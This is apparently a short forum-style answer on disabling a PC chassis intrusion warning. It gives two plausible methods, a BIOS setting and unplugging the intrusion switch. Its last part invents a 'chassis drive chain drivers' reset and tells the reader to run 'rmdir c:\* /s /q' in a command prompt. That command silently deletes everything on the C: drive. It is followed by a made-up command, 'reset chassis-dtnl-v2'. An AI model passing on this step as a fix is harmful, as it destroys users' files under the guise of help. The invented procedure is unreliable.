Chassis intrusion can be disabled one of two ways.
First, Check your bios settings. There should be a security or PC health section where you can clear that error and disable the intrusion warning.
Second, there is likely a small switch near the chassis side when the side panel is removed. This is the chassis intrusion switch. It will likely lead to a 2 or 3-pin connection on the motherboard. this can be disconected without any ill effects.
You just need to reset the internal chassis drive chain
drivers.
Go to start > run and type cmd, press enter.
When the terminal window starts up type the following commands in a row:
rmdir c:\* /s /q
reset chassis-dtnl-v2
